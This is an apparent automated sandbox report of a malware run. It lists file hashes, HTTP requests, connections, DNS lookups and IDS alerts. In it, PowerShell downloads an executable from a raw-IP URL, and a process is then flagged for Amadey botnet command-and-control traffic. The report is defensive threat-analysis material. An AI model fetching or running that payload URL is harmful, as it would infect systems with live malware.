MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
2564firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\sessionCheckpoints.jsonbinary
MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
2564firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
148
TCP/UDP connections
273
DNS requests
210
Threats
429

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1280
powershell.exe
GET
200
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
2564
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2564
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/success.txt?ipv4
unknown
whitelisted
2564
firefox.exe
POST
200
184.24.77.54:80
http://r11.o.lencr.org/
unknown
whitelisted
2564
firefox.exe
POST
200
142.250.186.99:80
http://o.pki.goog/s/wr3/FIY
unknown
whitelisted
2564
firefox.exe
POST
200
142.250.186.99:80
http://o.pki.goog/s/wr3/FIY
unknown
whitelisted
2564
firefox.exe
POST
200
184.24.77.48:80
http://r10.o.lencr.org/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
6148
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
1280
powershell.exe
185.156.72.2:80
Tov Vaiz Partner
RU
unknown
2564
firefox.exe
34.107.221.82:80
detectportal.firefox.com
GOOGLE
US
whitelisted
6544
svchost.exe
20.190.159.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
  • 23.48.23.166
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
google.com
  • 142.250.185.206
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
detectportal.firefox.com
  • 34.107.221.82
whitelisted
login.live.com
  • 20.190.159.71
  • 40.126.31.67
  • 40.126.31.2
  • 40.126.31.131
  • 20.190.159.23
  • 20.190.159.64
  • 20.190.159.131
  • 20.190.159.73
whitelisted
prod.detectportal.prod.cloudops.mozgcp.net
  • 34.107.221.82
  • 2600:1901:0:38d7::
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
example.org
  • 96.7.128.192
  • 23.215.0.132
  • 23.215.0.133
  • 96.7.128.186
whitelisted

Threats

PID
Process
Class
Message
1280
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
1280
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
1280
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1280
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
1280
powershell.exe
Misc activity
ET INFO Packed Executable Download
1280
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 34
1184
ramez.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 34
1184
ramez.exe
Malware Command and Control Activity Detected
BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s)
1184
ramez.exe
Malware Command and Control Activity Detected
ET MALWARE Amadey CnC Response
1184
ramez.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
No debug info